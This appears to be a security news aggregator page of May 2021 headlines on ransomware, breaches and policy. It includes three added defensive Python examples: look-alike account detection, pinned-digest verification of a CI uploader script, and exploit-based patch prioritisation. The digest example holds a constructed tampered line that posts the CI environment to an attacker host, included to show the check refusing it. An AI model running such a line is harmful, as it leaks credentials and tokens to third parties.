Friday, 28 May 2021

ASIS releases updated Protection of Assets reference set

To keep pace with the ever-evolving security industry, ASIS International has released an update to the Protection of Assets (POA) reference set. Refreshed to reflect our changing times and keep security professionals on the leading edge of best practices in the field, the collection is intended to assist security management directors and professionals responsible for corporate asset protection.

from Cyber Security News https://ift.tt/3urGDSF

APT actors exploiting Fortinet vulnerabilities to gain access to local governments

A web server hosting the domain for a local government in the United States was recently breached by advanced hackers exploiting old vulnerabilities in Fortinet firewalls, according to an FBI Flash Alert. After gaining access to the local government organization's server, the advanced persistent threat (APT) actors moved laterally through the network and created new domain controller, server, and workstation user accounts that mimicked already existing ones.

from Cyber Security News https://ift.tt/3oZwBXU
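The detail worth turning into a detection is the look-alike accounts. Below is an added example (not code from the FBI alert or from Cyber Security News) that runs a look-alike check over constructed Windows Security event 4720 ("A user account was created") records against a constructed directory listing. The field names, the homoglyph table and the similarity threshold are assumptions to be tuned against a real directory.

```python
"""Flag newly created accounts whose names mimic existing ones.

Added example, not the FBI alert's or the news site's code. It runs over a
constructed directory listing and constructed Windows Security event 4720
("A user account was created") records; the field names are assumptions.
"""
import difflib

# Constructed sample: accounts already in the directory (normally pulled from AD).
EXISTING_ACCOUNTS = ["jsmith", "svc_backup", "dc01$", "mlee", "administrator"]

# Constructed sample: event 4720 records reduced to the fields this check needs.
EVENTS_4720 = [
    {"time": "2021-05-10T03:12:07Z", "creator": "jsmith", "new_account": "jsmlth"},
    {"time": "2021-05-10T03:12:31Z", "creator": "jsmith", "new_account": "svc_backups"},
    {"time": "2021-05-10T03:13:02Z", "creator": "jsmith", "new_account": "dc01-admin"},
    {"time": "2021-05-11T14:40:00Z", "creator": "hr_provisioning", "new_account": "tnguyen"},
]

SEPARATORS = set("._- $")
# Single-character swaps that keep a name looking right at a glance (assumed table).
HOMOGLYPHS = str.maketrans({"l": "i", "1": "i", "0": "o", "5": "s", "3": "e"})


def normalize(name):
    """Lower-case, fold look-alike characters, drop separators and the computer-account '$'."""
    folded = name.lower().translate(HOMOGLYPHS)
    return "".join(ch for ch in folded if ch not in SEPARATORS)


def mimicked_account(new_account, existing, threshold=0.8):
    """Return the existing account that `new_account` imitates, or None.

    Three rules, cheapest first: identical after normalization, an existing
    name used as a prefix (svc_backup -> svc_backups), or a high edit-similarity
    ratio. The threshold is an assumption; tune it on your own directory.
    """
    candidate = normalize(new_account)
    for account in existing:
        if account.lower() == new_account.lower():
            continue  # the same account being re-created, not a look-alike
        base = normalize(account)
        if not base:
            continue
        if candidate == base:
            return account
        if len(base) >= 4 and candidate.startswith(base):
            return account
        if difflib.SequenceMatcher(None, candidate, base).ratio() >= threshold:
            return account
    return None


def flag_lookalike_creations(events, existing):
    """Return one finding per 4720 event whose new account mimics an existing one."""
    findings = []
    for ev in events:
        target = mimicked_account(ev["new_account"], existing)
        if target is not None:
            findings.append({
                "time": ev["time"],
                "creator": ev["creator"],
                "new_account": ev["new_account"],
                "mimics": target,
            })
    return findings


if __name__ == "__main__":
    for f in flag_lookalike_creations(EVENTS_4720, EXISTING_ACCOUNTS):
        print(f"{f['time']} {f['creator']} created {f['new_account']!r}, which mimics {f['mimics']!r}")
```

In the constructed sample the three accounts created from the compromised jsmith session within a minute are flagged (a homoglyph swap, a pluralised service account and a "dc01-admin" riding on the domain controller's name), while the legitimate provisioning event is not. Pair the name check with the creator and the creation rate: a user account that suddenly creates several others is the more reliable signal.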

DHS TSA announces Security Directive for pipeline sector

The Department of Homeland Security’s Transportation Security Administration (TSA) announced a Security Directive that will enable the Department to better identify, protect against, and respond to threats to critical companies in the pipeline sector.

from Cyber Security News https://ift.tt/3i0TNU0

5 minutes with Barak Tawily - Application security for enterprise security

Barak Tawily, Chief Technology Officer and Co-Founder of Enso Security, argues that most AppSec teams today spend most of their time creating relationships with developers and performing operational and product-related tasks — and not on application security. Here, we talk to Tawily about AppSec and why enterprise security should be concerned with AppSec.

from Cyber Security News https://ift.tt/3wEDIrd

Thursday, 27 May 2021

Why SASE is the key to unlocking widespread Zero Trust adoption

Streaming - and really all content creators and consumers - would not have accelerated as it did without that much-needed bandwidth. In much the same way, we see the idea of Zero Trust Network Security, introduced more than a decade ago, needing its own boost for more widespread adoption. That help has arrived in the form of Secure Access Service Edge (SASE), the ideal framework for Zero Trust.

from Cyber Security News https://ift.tt/3fO8gQF

How DevOps has changed the way app security works (Part 2)

App security is too important to be an afterthought. With the threats facing modern web applications, organizations need to find a new way to ensure protection without impeding innovation. To move forward, security and DevOps will need to work together to solve the challenges they face—in terms of both security and organizational politics.

from Cyber Security News https://ift.tt/34rEhIR

67% of utility applications have serious vulnerabilities

With the Colonial Pipeline ransomware attack that caused widespread East Coast fuel shortages still fresh in our minds, new WhiteHat Security research has found that application-specific attacks are at least as likely as ransomware attacks, if not more so.

from Cyber Security News https://ift.tt/3yKpSpl

Half of U.S. companies hit with privileged credential theft, insider threats in last year

ThycoticCentrify announced new research that reveals more than half of organizations have been grappling with the theft of legitimate, privileged credentials (53%) and insider threat attacks (52%) in the last 12 months. In 85% of the privileged credential theft instances, cybercriminals were able to access critical systems and/or data. In addition, two-thirds (66%) of insider threats led to abuse of administrative privileges to illegitimately access critical systems and/or data. 

from Cyber Security News https://ift.tt/2R2kvRm

Average cost of cloud account compromises reached $6.2 million over a 12-month period

Proofpoint, Inc. and Ponemon Institute released the results of a new study on “The Cost of Cloud Compromise and Shadow IT.” The average cost of cloud account compromises reached $6.2 million over a 12-month period, according to over 600 IT and IT security professionals in the U.S. In addition, 68% of these survey respondents believe cloud account takeovers present a significant security risk to their organizations, with more than half indicating the frequency and severity of cloud account compromises has increased over the last 12 months.

from Cyber Security News https://ift.tt/3fStyMO

5 minutes with Jason Passwaters - What cyberthreat intelligence can learn from the military

As a former Marine with expertise in counterintelligence, Human Intelligence (HUMINT) and Technical Surveillance Counter-Measures (TSCM), Jason Passwaters leveraged his international war fighting experience and built uniquely qualified teams at iSIGHT Partners, and then in co-founding Intel 471. His military service taught him to emphasize three areas that can make threat intelligence more targeted and actionable for organizations. 

from Cyber Security News https://ift.tt/3vr8Gmt

Wednesday, 26 May 2021

Bose victim of ransomware attack

In a breach notification letter filed with New Hampshire's Office of the Attorney General, Bose said that in early March 2021, the company "experienced a sophisticated cyber-incident that resulted in the deployment of malware/ransomware across" its "environment."

from Cyber Security News https://ift.tt/3bV8hBe

U.S. to issue first cybersecurity regulations after Colonial Pipeline ransomware attack

The Department of Homeland Security (DHS) will issue a directive later this week requiring all pipeline companies to report cybersecurity incidents to federal authorities. The directive comes two weeks after Colonial Pipeline, which operates the biggest gasoline conduit to the East Coast, was forced to shut down its 5,500-mile pipeline after a devastating ransomware attack.

from Cyber Security News https://ift.tt/3wztoRl

Mission-critical: Northern Virginia sets out to solve the cybersecurity workforce shortage

What the COVID-19 crisis is ultimately doing to the cybersecurity industry is shining a spotlight on it. In what is one of the only benefits of the critical issue, it has allowed many in Northern Virginia to elevate and extend a slew of innovative measures that companies and the region are implementing to combat the problem. As they set out to solve the industry talent shortage, Northern Virginia found the following strategies to be impactful steps in tandem toward a solution.

from Cyber Security News https://ift.tt/3yGK4rR

Tuesday, 25 May 2021

5 minutes with Tehila Shneider - Authorization policy management in the enterprise

While authentication and authorization might sound similar, they are two distinct security processes in the identity and access management (IAM) space. Authentication is the security practice of confirming that someone is who they claim to be, while authorization is the process of establishing the rights and privileges of a user. Here, we talk to Tehila Shneider about authorization, authentication, and why authorization remains a problem that is mostly unsolved.

from Cyber Security News https://ift.tt/3bUGktg

Conti ransomware attacks impact healthcare and first responder networks

The FBI identified at least 16 Conti ransomware attacks targeting U.S. healthcare and first responder networks, including law enforcement agencies, emergency medical services, 9-1-1 dispatch centers, and municipalities within the last year. These healthcare and first responder networks are among the more than 400 organizations worldwide victimized by Conti, over 290 of which are located in the U.S.

from Cyber Security News https://ift.tt/3oMpkKS

GAO: Cyber premiums rise as insurers struggle to assess risk

The increase in cyber insurance adoption and premium prices coincides with a changing, and more challenging, threat landscape, according to a new GAO report on cyber insurance. The report describes key trends in the current market for cyber insurance, identifies challenges faced by the cyber insurance market, and lays out options to address them. To conduct the study, GAO analyzed industry data on cyber insurance policies; reviewed reports on cyber risk and cyber insurance from researchers, think tanks, and the insurance industry; and interviewed Treasury officials.

from Cyber Security News https://ift.tt/3oMso9K

J.R. Cunningham named Chief Security Officer at Nuspire

Nuspire, a managed security services provider (MSSP), announced the appointment of industry veteran J.R. Cunningham as Chief Security Officer. In this role, Cunningham will oversee Nuspire's security strategy, oversight of policies and compliance, and the new Nuspire Security Program, a step-by-step program designed to help Nuspire's customers build customizable security programs. Cunningham joins Nuspire with over 25 years of experience building and maintaining security programs, security strategy consulting, cyber practitioner leadership and creating successful long-term client relationships through strategic consulting.

from Cyber Security News https://ift.tt/34diAft

Monday, 24 May 2021

Palo Alto Cortex Xpanse Researchers identify missing metric for a modern SOC

Palo Alto Cortex Xpanse research team spent the first three months of 2021 monitoring the activities of attackers to better understand how much of an edge adversaries have in detecting systems that are vulnerable to attack. They followed a benchmark that they call “mean time to inventory” (MTTI), which is simply how long it takes somebody to start scanning for a vulnerability after it’s announced. Xpanse research found 79% of observed exposures occurred in the cloud.

from Cyber Security News https://ift.tt/3yzBQ4Z

Only 1 in 5 say critical infrastructure organizations should pay ransom if attacked

In the aftermath of the Colonial Pipeline attack, global IT association and learning community ISACA polled more than 1,200 members in the United States and found that 84% of respondents believe ransomware attacks will become more prevalent in the second half of 2021. The Colonial Pipeline attack caused massive disruptions to gasoline distribution in parts of the US this month, resurfacing preparedness for ransomware attacks as a front-burner topic for enterprises around the world. Colonial reportedly authorized a ransom payment of US $4.4 million. In the ISACA survey, four out of five survey respondents say they do not think their organization would pay the ransom if a ransomware attack hit their organization. Only 22% say a critical infrastructure organization should pay the ransom if attacked.

from Cyber Security News https://ift.tt/2Tfp2k7

Sunday, 23 May 2021

Digital security infrastructure unlocks the door to a more secure return to the office

One thing is clear: the hybrid model will be permanent. In addition to managing the concerns about physical safety with staffers in the building, any outbreaks or high absenteeism negatively impact the bottom line and the company's reputation. Occupier requirements are constantly evolving and they are driving new considerations for landlords and workspace providers. It takes best-of-breed technology to remove the complexity and make workspaces really work effectively while meeting the increased demands of today's tenants. Let's review the core considerations and components required to create a secure tech operating layer that assures the integrity of the workspace, operation and infrastructure while delivering a great occupier experience.

from Cyber Security News https://ift.tt/3fJjq94

5 minutes with Roy Horev - The evolution of DDoS attacks

Distributed denial of service (DDoS) attacks, in which an attacker attempts to make it impossible for a service to be delivered, are increasing in size, frequency and duration. Kaspersky Lab reported a doubling of DDoS attacks in the first quarter of 2020 compared with the fourth quarter of 2019, plus an 80% jump compared with the same quarter of the previous year. To learn more about how these attacks have evolved over the years, we talk to Roy Horev, Co-Founder and CTO at Vulcan Cyber, a vulnerability remediation orchestration provider.

from Cyber Security News https://ift.tt/3bL2Kgf

Friday, 21 May 2021

Data of more than 100 million Android users exposed by mobile app developers

Researchers at Check Point Research analyzing Android apps have discovered serious cloud misconfigurations leading to the potential exposure of data belonging to more than 100 million users. In a report published recently, the firm discusses how the misuse of real-time database, notification managers, and storage exposed over 100 million users’ personal data (email, passwords, names, etc.) and left corporate resources vulnerable to malicious actors.

from Cyber Security News https://ift.tt/2SikF76

Thursday, 20 May 2021

5 steps to integrating security into the app development process (without disrupting CI/CD workflows)

The traditional approach to securing cloud access goes against everything that DevOps is about. Regardless of what providers of legacy IAM, PAM, and other security solutions claim about their ability to scale with cloud application dev cycles, they’re concealing the extensive time, effort, and resources required to manage their solutions – three things that are in short supply in DevOps teams.  So, the challenge becomes: how can enterprises integrate world class technologies for securing identities and access to cloud environments without bringing DevOps to a grinding halt?

from Cyber Security News https://ift.tt/2RyjiRO

New survey finds that password hygiene amongst cybersecurity leaders is lacking

Constella Intelligence (“Constella”), Digital Risk Protection leader, released the results of “Cyber Risk in Today’s Hyperconnected World,” a survey that unlocks the behaviors and tendencies that characterize how vigilant organizations’ leaders are when it comes to reducing cyber vulnerability, allowing the industry to better understand how social media is leveraged as an attack vector and how leaders are responding to this challenge.

from Cyber Security News https://ift.tt/2SWPoaf

5 minutes with Todd Waskelis - Cybersecurity consulting during the pandemic

COVID-19 brought with it a massive influx of data, most of it moving from a centralized location to the cloud (and other environments). Now, these businesses are trying to understand how to re-engineer their environment for the next 10+ years, in the advent of Zero Trust, SASE and more. How has COVID-19 impacted the need for cybersecurity consulting, specifically new trends, and Zero Trust? Here, we speak with Todd Waskelis, AVP of AT&T Cybersecurity, who leads AT&T’s cybersecurity consulting services. 

from Cyber Security News https://ift.tt/341XP6r

Can you hack the municipality of The Hague (Nl)?

The municipality of The Hague in The Netherlands allows itself to be hacked every year during Hâck The Hague, a hacking competition organized by the municipality together with cybersecurity company Cybersprint. On Monday, September 27, 2021, 200 ethical hackers from the Netherlands and abroad will once again try to detect vulnerabilities in the digital infrastructure of the municipality and its suppliers. With this competition, The Hague wants to increase its resilience and stimulate its suppliers to continuously be in top digital condition, so that peace and security can be guaranteed.

from Cyber Security News https://ift.tt/2S68iLw

Wednesday, 19 May 2021

The pandemonium of the pandemic: How working from home has changed the cybersecurity formula

Now, let’s consider how the pandemic has impacted the world of cybercrime. In the beginning, the move to work from home was swift, with organizations being closed and the workforce being sent home to work with little or no warning. People began stockpiling items and even staples such as toilet paper became a scarce commodity. As schools closed, the students were forced to start doing classes online, something a lot of families were not prepared for. Many found themselves in financial difficulties. For those still working, with daycares closing, childcare became an issue, and many people did not have laptops or computers set up at home to support these changes. Even webcams became nearly impossible to get unless you were willing to pay the scalpers’ prices.

from Cyber Security News https://ift.tt/3v3hsaf

ARP funding to boost school safety, technology upgrades across the U.S.

Congress sent some rather clear messages with passage of the American Rescue Plan (ARP), and the importance of education is undoubtedly top of mind. Based on the sheer volume of school safety allocations, protecting our nation’s students is a high priority with the Biden administration and a majority in Congress.

from Cyber Security News https://ift.tt/33XJzLU

New research shows how security teams can avoid cyberattacks by utilizing the right data and artificial intelligence

Vectra AI, provider of threat detection and response,  released its 2021 Q2 Spotlight Report, Vision and Visibility: Top 10 Threat Detections for Microsoft Azure AD and Office 365. This new research details the top 10 threat detections that customers receive by relative frequency when Vectra detects abnormal behavior in a customer environment, which are then used by customers to help ratify attacks in cloud environments.

from Cyber Security News https://ift.tt/3u1olYj

FBI sees record complaints for online scams and investment fraud

The FBI says that complaints concerning online scams and investment fraud have now reached a record-breaking level. The Internet Crime Complaint Center (IC3) received its six millionth complaint on May 15. It took nearly seven years for the FBI’s Internet Crime Complaint Center (IC3) to log its first million complaints. It took only 14 months to add the most recent million. 

from Cyber Security News https://ift.tt/3yq66Pu

5 minutes with Ben Johnson - SaaS apps security issues

Ben Johnson, formerly of the NSA and now Chief Technology Officer (CTO) of SaaS application security firm Obsidian, has found that businesses around the world are adopting Software as a Service (SaaS) apps in droves for collaboration, ease of access to data and business continuity. With this increased adoption comes the inevitable trend of state-sponsored actors merely logging in to steal data rather than having to break in. Here, Johnson talks to Security magazine about security issues associated with SaaS applications.

from Cyber Security News https://ift.tt/33Xg79a

Tuesday, 18 May 2021

Moving to measure a cyber-aware culture

We have all been served by a surly retailer who made us feel that their job and life would be easier if it weren't for the customers. Alas, sometimes it feels the same applies in cybersecurity. Life would be so much better, if not for those pesky employees.

from Cyber Security News https://ift.tt/3our0Zo

Colonial Pipeline ransomware attack proves yet again that cybersecurity is paramount: Why companies don't take cybersecurity seriously

The recent ransomware attack on the Colonial Pipeline has reinvigorated calls from legislators to strengthen the defenses of U.S. pipelines and the electric power grid. Over the last several years, a repeatable pattern has become apparent with each major cyber-attack. A critical cyberattack occurs, followed by outrage that results in statements from government leaders with calls for action, all followed by proposed ideas on how to better mitigate the risk of cyberattacks in the future. Yet it seems that time goes by and with the next major attack the cycle starts all over again. This time, government is taking a more rigorous approach to proposing solutions to end the vicious cycle.

from Cyber Security News https://ift.tt/2SXdEZT

Conti ransomware gang to blame for Irish public health system cyberattack

Conti ransomware gang appears to be behind Ireland's Health Service Executive (HSE) ransomware attack, according to reports. HSE, a $25 billion public health system, shut down its IT systems to protect the service from further damage, switching to a paper-based system. Though life-saving equipment and COVID-19 vaccine programs were still operating, several healthcare practices across Ireland were forced to cancel low priority appointments.

from Cyber Security News https://ift.tt/3wbyQtB

PHDays and The Standoff taking place May 18-21

The Standoff 2021 is taking place this week May 18-21, in conjunction with PHDays (Positive Hack Days) – one of the top cybersecurity conferences in Europe that features the world's cutting edge in digital security every year. The Standoff is an online offensive/defensive competition in which defenders (blue teams) compete against attackers (red teams) to control the infrastructure of a simulated digital city.

from Cyber Security News https://ift.tt/3v0CB4N

Rapid7 victim of a software supply chain breach

Rapid7 disclosed that the attackers behind the Codecov breach had accessed some of the company's source code using a previously compromised Bash Uploader script from Codecov.

from Cyber Security News https://ift.tt/3yk8Q0O
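The Bash Uploader was fetched and run straight from the vendor, so a modified copy ran with whatever secrets the CI job held. Below is an added example (not Codecov's or Rapid7's code) of the control that breaks that pattern: pin a digest obtained out of band and refuse to execute the fetched script unless it matches. The script body, the tampered variant and the exfiltration line are constructed for illustration, and the pinned digest is computed from the known-good bytes only so the example runs offline.

```python
"""Verify a CI helper script against a pinned digest before executing it.

Added example, not Codecov's or Rapid7's code. The script body, the tampered
variant and the exfiltration line are constructed for illustration. The pinned
digest must come from a channel independent of the download itself (a signed
checksum file, release notes, or a value committed to your own repository);
here it is computed from the known-good bytes only so the example is self-contained.
"""
import hashlib
import hmac
import os
import subprocess
import tempfile

# Constructed stand-in for a vendor-supplied uploader script.
GOOD_SCRIPT = b'#!/bin/sh\necho "uploading coverage report"\n'

# Constructed stand-in for the same script with an appended line that ships the
# CI environment (tokens, keys) to a third party, the pattern behind the breach.
TAMPERED_SCRIPT = GOOD_SCRIPT + b'curl -s -d "$(env)" https://attacker.example/collect\n'

# In a real pipeline this is a literal obtained out-of-band, not computed at run time.
PINNED_SHA256 = hashlib.sha256(GOOD_SCRIPT).hexdigest()


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def verify_pinned(data, pinned_hex):
    """True only if the script bytes hash to the pinned digest (constant-time compare)."""
    return hmac.compare_digest(sha256_hex(data), pinned_hex.strip().lower())


def run_verified_script(data, pinned_hex, args=()):
    """Execute the script with `sh` only after the digest check passes.

    Replaces `curl https://vendor/uploader | bash`: the bytes are written to a
    temporary file after verification, so what runs is exactly what was checked.
    """
    if not verify_pinned(data, pinned_hex):
        raise RuntimeError("uploader digest mismatch; refusing to execute")
    fd, path = tempfile.mkstemp(suffix=".sh")
    try:
        with os.fdopen(fd, "wb") as fh:
            fh.write(data)
        result = subprocess.run(["sh", path, *args], capture_output=True, text=True, check=True)
        return result.stdout
    finally:
        os.unlink(path)


if __name__ == "__main__":
    print(run_verified_script(GOOD_SCRIPT, PINNED_SHA256), end="")
    try:
        run_verified_script(TAMPERED_SCRIPT, PINNED_SHA256)
    except RuntimeError as exc:
        print(exc)
```

Two points follow from the check. The digest is only as trustworthy as the channel it came from, so a checksum file served from the same host as the script adds nothing; a signature over the checksum, or a value reviewed into your own repository, does. And the job should run with the minimum set of secrets: a pinned digest stops a tampered script, but the blast radius of any script is still every credential in its environment.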

Monday, 17 May 2021

Welcome to the new world of triple extortion ransomware

Ransomware is nothing new. But the tactics, techniques and procedures (TTPs) leveraged by threat actors have reached new levels of sophistication over the last few years. And with that growth has come an increased difficulty in protecting networks against costly attacks such as the recent DarkSide one on the Colonial Pipeline.

from Cyber Security News https://ift.tt/2ST5l17

Healthcare’s next emergency: Ransomware follows in the footsteps of the pandemic

Healthcare businesses are already reeling from massive losses during the pandemic, and cyberattacks could cause further long-term damage beyond the initial attack. Research at Morphisec indicates that almost 3 in 10 consumers say they would consider switching providers if their records were breached in a cyberattack. Considering that the same report found that 1 in 5 Americans say a cyberattack has impacted their healthcare provider in the past year, it's undoubtedly worrying news for the entire industry. With this in mind, here are three avenues hackers are likely to exploit as healthcare becomes a more attractive target, and what providers need to do to protect their sensitive data and safeguard the lives of their patients.

from Cyber Security News https://ift.tt/3or60Tt

FIRST 33rd Annual Conference to be streamed live June 7-9, 2021

The Forum of Incident Response and Security Teams (FIRST) will hold its 33rd annual conference next month, June 7-9, 2021. Held online, the 33rd FIRST Conference: ‘Crossing Uncertain Times,’ is set to stream live from June 7, UTC at 1200hrs. The three-day event will feature keynote presentations highlighting recent global security incidents, pertinent industry panel discussions, and a range of presentations by global experts from across the incident response and security industry.

from Cyber Security News https://ift.tt/3uTsoXV

Who owns AD security in your organization?

Establishing operational resilience in the face of cyberattacks has become a top priority for organizations. As a core component of the IT infrastructure, Active Directory (AD) must be at the center of that process. But who is responsible for ensuring Active Directory is both protected and can be recovered quickly when a cyberattack occurs? In many organizations the answer is not clear, which can lead to missteps in detecting, defending against, and responding to cyberattacks.

from Cyber Security News https://ift.tt/3omZay4

Thursday, 13 May 2021

How to select a cybersecurity framework to protect your greatest assets: People, property and data

Even if you are not mandated to adhere to any particular regulations, it still makes sense for your business to be proactive in managing risk. All frameworks include guidance for good cybersecurity hygiene, such as effective inventory and asset management, contingency planning, personnel security, system access control, and staff awareness and training, to list a few. To prepare for the aftermath of a cyber incident, frameworks provide incident response guidelines you can follow to recover and try to limit the damage. Establishing a framework can not only help your organization follow best practices but also bring rigorous cyber discipline to your organization.

from Cyber Security News https://ift.tt/2RgYOwU

President Biden signs executive order to strengthen U.S. cybersecurity defenses

U.S. President Joe Biden has signed an executive order (EO) to improve the cybersecurity of the U.S. As the U.S. faces persistent and increasingly sophisticated malicious cyber campaigns that threaten the public sector, the private sector, and ultimately people's security and privacy, the EO seeks to improve efforts to identify, deter, protect against, detect, and respond to these actions and actors. Specifically, the EO will:



from Cyber Security News https://ift.tt/2RUvnko

Wi-Fi vulnerability may put millions of devices at risk

Noted security expert Mathy Vanhoef recently discovered a set of Wi-Fi security vulnerabilities that, if exploited, would allow an attacker within radio range to steal user information or attack devices. The vulnerabilities, known as FragAttacks (fragmentation and aggregation attacks), are design flaws in the Wi-Fi standard and therefore affect most devices. In addition, Vanhoef discovered several other vulnerabilities that are caused by widespread programming mistakes in Wi-Fi products.

from Cyber Security News https://ift.tt/3yc1oVM

Wednesday, 12 May 2021

Learnings from the Colonial Pipeline cyberattack: focus on the 98% of attacks, not the 2%!

For many years, the focus on securing OT environments has been on the imminent danger of a cyberattack upon critical infrastructure, in other words, SCADA/ICS attacks. Most of the concern has been on nation state actors like China, North Korea, Iran and Russia directly attacking and destroying our infrastructure.

from Cyber Security News https://ift.tt/3fdc3qu

Cybersecurity tips for your remote workforce

As a significant number of employees are now working remotely, cyber criminals are hard at work devising new ways to infiltrate your networks and take advantage of unsuspecting targets. Listed below are a few of the more prevalent attempts being used to gain access and potentially disrupt your business and steps you can take to help stop them.

from Cyber Security News https://ift.tt/2RdR6Uf

Apple failed to disclose security incident affecting 128 million users in 2015

An email entered into court this week in Epic Games' lawsuit against Apple shows that Apple managers uncovered 2,500 malicious apps had been downloaded a total of 203 million times by 128 million users in 2015. Evidence shows Apple managers chose to not disclose this security incident. 

from Cyber Security News https://ift.tt/33E2DPs

Most enterprise cybersecurity teams lack the ability to remediate risk

Vulcan Cyber released the results of its latest vulnerability remediation maturity research project. A survey of more than 100 enterprise security executives across North America and EMEA found that most enterprise cybersecurity and vulnerability management organizations lack the ability to drive remediation initiatives, to reduce risk and achieve acceptable levels of cyber hygiene.

from Cyber Security News https://ift.tt/33zTven

Study reveals growing cybersecurity risks driven by remote work

HP Inc. released its HP Wolf Security Blurred Lines & Blindspots Report, a comprehensive global study assessing organizational cyber risk in an era of remote work. The report shows that changing work styles and behaviors are creating new vulnerabilities for companies, individuals, and their data. According to the findings, 70% of office workers surveyed admit to using their work devices for personal tasks, while 69% are using personal laptops or printers for work activities. Almost one-third (30%) of remote workers surveyed have let someone else use their work device.

from Cyber Security News https://ift.tt/3uKVb0S

Tuesday, 11 May 2021

The perils of lax security hygiene and what organizations can do about it

While cybersecurity attack methods are rapidly evolving, it's more often than not a misuse of administrative privileges and weak or stolen credentials that are enough to breach any critical infrastructure. Let's take the attack on the water treatment plant for example—all it took for the unidentified perpetrator was one unprotected password to access and handle the control systems remotely. Time and again, incidents like this prove that when passwords are stored in secure vaults and are subject to standard security practices, the chances of getting hacked are far lower.

from Cyber Security News https://ift.tt/3bkWo7g

How to prioritize patching in the exploit storm

COVID made "flatten the curve" a household phrase in 2020, but did you know the concept also applies to vulnerability exploits? It turns out that what's past is prologue in exploit trends. By tracking which vulnerabilities are being exploited the most, organizations gain important information to help proactively determine their exposure and risk. But it is also important to track attacks where activity has increased the most within a specified timeframe. It only takes one critical exploit to cause significant damage and, once inside the network, the attacker will need to move laterally and probably deploy additional exploits. That's why understanding which exploits have the greatest likelihood of arriving on the network's doorstep helps organizations prioritize patch management and risk assessment. This remains top of mind as cyber adversaries continue to exploit vulnerabilities at scale, as we have recently seen with DearCry ransomware, for example.

from Cyber Security News https://ift.tt/2RamJxS
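The two signals the excerpt names, overall prevalence and recent growth, can be combined into a patch ordering. The following is an added example, not the cited report's model: it ranks constructed weekly detection counts for four placeholder signatures (not real vulnerability identifiers) so that a surging exploit outranks a steady high-volume one, and parks signatures too small to rank on a watchlist. The scoring formula is an assumption chosen for that behaviour.

```python
"""Rank observed exploit activity by prevalence and by recent growth.

Added example; not the cited report's model, and the data is constructed.
Each entry holds weekly detection counts over an eight-week window; the names
are placeholders rather than real vulnerability identifiers. The scoring
(log-scaled volume times log-scaled growth) is an assumption chosen so that a
surging exploit outranks a steady high-volume one.
"""
import math

WEEKLY_HITS = {
    "exploit-a": [900, 880, 910, 905, 890, 900, 915, 920],  # steady, high volume
    "exploit-b": [5, 4, 6, 5, 40, 160, 640, 2500],          # low base, surging
    "exploit-c": [300, 280, 260, 250, 240, 200, 180, 150],  # declining
    "exploit-d": [0, 0, 0, 0, 0, 0, 2, 3],                  # brand new, tiny
}


def volume(hits):
    """Total detections across the window: the "exploited the most" signal."""
    return sum(hits)


def growth(hits, recent=2):
    """Average of the last `recent` weeks over the average of the weeks before.

    The +1 in the denominator keeps a signature with no prior activity from
    producing an infinite ratio.
    """
    head, tail = hits[:-recent], hits[-recent:]
    baseline = sum(head) / len(head) + 1.0
    return (sum(tail) / len(tail)) / baseline


def score(hits, recent=2):
    """Prevalence and growth, both log-scaled so neither dominates outright."""
    return math.log1p(volume(hits)) * math.log1p(growth(hits, recent))


def prioritize(table, recent=2, min_volume=20):
    """Names to patch first, highest score first; tiny signatures go to the watchlist."""
    eligible = [n for n, h in table.items() if volume(h) >= min_volume]
    return sorted(eligible, key=lambda n: score(table[n], recent), reverse=True)


def watchlist(table, recent=2, min_volume=20):
    """Signatures too small to rank yet but already rising; check again next week."""
    return [n for n, h in table.items() if volume(h) < min_volume and growth(h, recent) > 1.0]


if __name__ == "__main__":
    for name in prioritize(WEEKLY_HITS):
        hits = WEEKLY_HITS[name]
        print(f"{name}: volume={volume(hits)} growth={growth(hits):.2f} score={score(hits):.2f}")
    print("watchlist:", watchlist(WEEKLY_HITS))
```

On the constructed data the surging signature ranks first despite having less than half the volume of the steady one, the declining signature drops to the bottom, and the brand-new one is held on the watchlist. The window length, the growth horizon and the volume floor are all knobs; what matters is that the ranking is recomputed from fresh telemetry every week, since the excerpt's point is that last week's exploit curve predicts next week's.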

The value of better data in third-party risk assessments

RiskRecon, a Mastercard Company, and the Cyentia Institute published “From Uncertainty to Understanding: The Value of Better Data in Third-Party Risk Assessments.” To help organizations choose the best data to power their third-party risk models, RiskRecon partnered with Cyentia Institute to conduct the research study that quantifies how high-fidelity data turns risk assessments from an exercise of uncertainty to one of understanding.

from Cyber Security News https://ift.tt/3uCCcFG

Monday, 10 May 2021

Jim Doggett named CISO at Semperis

Semperis announced the appointment of James (Jim) W. Doggett Jr. as chief information security officer (CISO). A longtime partner at Ernst & Young (EY) LLP and a veteran security and risk executive, Doggett will be responsible for managing Semperis’ cybersecurity posture and information and risk management program, along with helping customers improve the resiliency of their foundational identity systems.

from Cyber Security News https://ift.tt/3f7CrlA

Now ransomware is inundating public school systems

Almost every American adult knows that cyberattacks and breaches are ubiquitous and have primarily targeted companies and government entities. They might even know that the most common type of attack these days is ransomware, a malicious process by which hackers encrypt computer systems and data and withhold the means to restore them until a ransom is paid. Few, however, are aware that ransomware is targeting a new set of highly vulnerable victims en masse. In recent months, the majority of successful ransomware attacks have struck K-12 schools nationwide, casting a whole new light on the number of Americans highly susceptible to a cyberattack.



from Cyber Security News https://ift.tt/3bgvvBx

How to defend your network systems from cyberattack

Let’s face it. Cybercriminals are smart. They’re aggressive, persistent, and opportunistic. They can sniff out an open port—a device running outdated software—and use it to invade the network. With cyberattacks on the rise, companies need to continually assess threats and adjust their cybersecurity posture accordingly.



from Cyber Security News https://ift.tt/33vXSar

Colonial Pipeline remains offline after ransomware attack

Colonial Pipeline, which operates the biggest gasoline conduit to the East Coast, said it has no estimate on when it could restart the 5,500-mile pipeline that it shut Friday after a cyberattack. The company took systems offline to contain the threat, temporarily halting all pipeline operations and affecting some IT systems. In a statement, the company said the Colonial Pipeline operations team is developing a system restart plan, and while its mainlines remain offline, some smaller lateral lines between terminals and delivery points are now operational.



from Cyber Security News https://ift.tt/3o230wx

Sunday, 9 May 2021

Google wants to enable MFA by default

In a blog post commemorating World Password Day, Google announced the move to make users sign in via a second step after entering a password, such as a mobile app.

from Cyber Security News https://ift.tt/3bcYCp2

AXA halts ransomware crime reimbursement in France

Global insurance company AXA said Thursday it will stop writing cyber-insurance policies in France that reimburse customers for extortion payments made to ransomware criminals.

from Cyber Security News https://ift.tt/3nZVwtY

Lessons learned from the iPhone call recording app vulnerability

